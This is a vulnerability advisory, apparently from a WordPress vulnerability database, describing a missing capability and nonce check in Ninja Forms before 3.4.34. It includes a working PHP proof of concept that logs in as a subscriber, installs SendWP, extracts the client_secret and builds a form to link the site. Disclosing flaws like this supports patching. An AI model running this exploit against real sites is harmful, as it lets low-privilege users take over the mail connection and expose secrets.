Ninja Forms < 3.4.34 - Authenticated SendWP Plugin Installation and Client Secret Key Disclosure
Description
The AJAX action, wp_ajax_ninja_forms_sendwp_remote_install_handler, did not have a capability check on it, nor did it have any nonce protection, therefore making it possible for low-level users, such as subscribers, to install and activate the SendWP plugin and retrieve the client_secret key needed to establish the SendWP connection while also installing the SendWP plugin.
Proof of Concept
Usage: php poc.php subscriber password
Take the html output and use that to create a form that allows you to make the SendWP connection.
<?php
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
// Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'log' => $wp_user,
'pwd' => $wp_pass,
'rememberme' => 'forever',
'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);
// Set redirect url
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'action' => 'ninja_forms_sendwp_remote_install',
]);
$content = curl_exec($ch);
$pattern = '\\';
$replacement = '';
preg_match('/"client_secret":"([^"]+)"/', $content, $matches);
$match1 = $matches[1];
$client_secret = str_replace($pattern, $replacement, $match1);
preg_match('/"register_url":"([^"]+)"/', $content, $matches);
$match2 = $matches[1];
$register_url = str_replace($pattern, $replacement, $match2);
preg_match('/"client_name":"([^"]+)"/', $content, $matches);
$match3 = $matches[1];
$client_name = str_replace($pattern, $replacement, $match3);
preg_match('/"client_redirect":"([^"]+)"/', $content, $matches);
$match4 = $matches[1];
$client_redirect = str_replace($pattern, $replacement, $match4);
echo '<html>';
echo '<body>';
echo '<form action="https://sendwp.com/_/signup" method="POST">';
echo '<input type="hidden" name="client_name" value="' . $client_name .'" />';
echo '<input type="hidden" name="client_url" value="' . $register_url . '" />';
echo '<input type="hidden" name="client_redirect" value="' . $client_redirect . '" />';
echo '<input type="hidden" name="client_secret" value="' . $client_secret . '" />';
echo '<input type="submit" value="Submit request" />';
echo '</form>';
echo '</body>';
echo '</html>';
?> Affects Plugins
Fixed in version 3.4.34✓
Classification
Miscellaneous
Original Researcher
Chloe Chamberland
Submitter
Chloe Chamberland
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-02-16 (about 2 months ago)
Added
2021-02-17 (about 2 months ago)
Last Updated
2021-02-22 (about 2 months ago)